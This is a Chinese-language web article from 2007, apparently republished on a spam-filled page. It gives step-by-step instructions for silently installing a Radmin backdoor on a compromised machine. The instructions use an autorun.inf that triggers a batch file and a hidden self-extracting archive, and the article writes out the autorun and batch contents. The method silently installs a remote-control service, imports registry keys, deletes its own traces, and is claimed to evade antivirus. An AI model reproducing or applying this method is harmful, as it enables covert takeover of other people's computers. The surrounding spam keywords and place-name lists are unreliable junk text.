国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区

掃一掃
關注微信公眾號

黑客入侵網站后全自動安裝后門
2007-01-19   

這里只需要你有上傳的權限。

一共三個文件:1.Autorun.inf、2.Shell.bat、3.Hao.exe(自解壓文件)。

思路:

全部放在C盤下。當肉雞主人雙擊C盤時自動運行第一文件,第一文件帶動運行第二文件,同時第二運行第三運行完可正常進入C盤。不會讓人發覺。并且里面所帶的批處理,會在最后把所有文件刪除。此時,后門卻已經裝上去了(此法針對沒有權限運行木馬的入侵活動)。

制作:

[autorun] open=shell.bat,這個是autorun.inf @echo off hao.exe c:\windows\explorer c:\ del autorun.inf del rad.exe del shell.ba,這個是shell.bat hao.exe,里面包含admdll.dll、raddrv.dll、admin.reg、pchealthy.exe、r.bat五個文件(關鍵所在)r.bat——批處理做法 @echo off @pchealthy.exe /install /silence @regedit /s admin.reg @net start r_server @del admin.reg @del r.bat,其他四個就是Radmin的文件。這個大家都會,復制過來就行。

我們再來看自解壓的處理。在解壓路徑里我們用 %systemroot%\system32,就是解壓到系統目錄里,并且“解壓后運行”填上我們的r.bat文件。因為這里的文件比較多,比較隱蔽。解壓模式我們選 “全部隱藏”,和 “覆蓋所有文件”! 好了,一個不被殺毒軟件所能查殺的好后門程序就成功制作出來了!

大家不要放在文件夾里壓縮哦,要直接選上admdll.dll、raddrv.dll、admin.reg、pchealthy.exe、r.bat五個文件壓縮,這樣就行啦。

責任編輯: 雪花(TEL:(010)68476636-8008)

熱詞搜索:

上一篇:使用MD5變換算法來防止窮舉破譯密碼
下一篇:黑客技巧 通過系統權限法來清理木馬

分享到: 收藏
主站蜘蛛池模板: 建始县| 包头市| 武邑县| 姜堰市| 新源县| 阿拉善左旗| 鄂尔多斯市| 江山市| 井冈山市| 霞浦县| 高碑店市| 宁陕县| 淅川县| 上虞市| 麦盖提县| 沐川县| 乌苏市| 元氏县| 阳东县| 厦门市| 鸡泽县| 玉田县| 瑞昌市| 青龙| 巫溪县| 三江| 贵港市| 军事| 化德县| 台中县| 天气| 瑞丽市| 柳州市| 巴南区| 全南县| 玉溪市| 桐乡市| 绵阳市| 台安县| 华蓥市| 攀枝花市|